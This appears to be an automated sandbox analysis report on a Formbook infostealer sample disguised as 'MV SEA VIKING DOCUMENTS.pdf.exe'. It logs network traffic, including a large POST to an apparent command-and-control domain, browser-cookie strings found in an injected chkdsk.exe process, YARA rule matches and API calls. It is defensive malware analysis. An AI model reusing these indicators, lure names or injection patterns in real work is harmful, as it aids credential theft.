      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:55:54 GMTContent-Type: text/htmlContent-Length: 275ETag: "620175f4-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:56:05 GMTContent-Type: text/htmlContent-Length: 275ETag: "61fc6928-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Mon, 21 Feb 2022 15:56:57 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 44 69 65 20 61 6e 67 65 67 65 62 65 6e 65 20 53 65 69 74 65 20 6b 6f 6e 6e 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 77 65 72 64 65 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data 
Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Feb 2022 15:57:07 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 72 65 73 64 78 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buresdx.com Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 21 Feb 2022 15:57:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 215X-Sorting-Hat-ShopId: 59546730662X-Dc: gcp-europe-west1X-Request-ID: e8a9a7ce-56d1-4369-a2f3-2ed7528383daX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6e112b9c8aa56961-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 
64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:57:41 GMTContent-Type: text/htmlContent-Length: 275ETag: "61fc68f2-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 21 Feb 2022 15:57:52 GMTContent-Type: text/htmlContent-Length: 275ETag: "620175f5-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
      Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: chkdsk.exe, 00000015.00000002.7218459494.0000000005F56000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7219660472.000000000662C000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000003.4843229229.0000000004D26000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000000.4625167186.000000002302C000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
      Source: chkdsk.exe, 00000015.00000002.7218459494.0000000005F56000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7219660472.000000000662C000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000003.4843229229.0000000004D26000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000000.4625167186.000000002302C000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
      Source: unknown | HTTP traffic detected: POST /be4o/ HTTP/1.1 | Host: www.vendasdigitaisonline.com | Connection: close | Content-Length: 174831 | Cache-Control: no-cache | Origin: http://www.vendasdigitaisonline.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.vendasdigitaisonline.com/be4o/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
      Source: unknown | HTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49756 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49757 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49807 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49808 version: TLS 1.2
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe | Code function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056DE

      E-Banking Fraud

      Source: Yara match | File source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      System Summary

      Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: initial sample | Static PE information: Filename: MV SEA VIKING DOCUMENTS.pdf.exe
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Section loaded: edgegdi.dll
      Source: C:\Windows\SysWOW64\chkdsk.exe, Section loaded: edgegdi.dll
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, Section loaded: edgegdi.dll
      Source: MV SEA VIKING DOCUMENTS.pdf.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
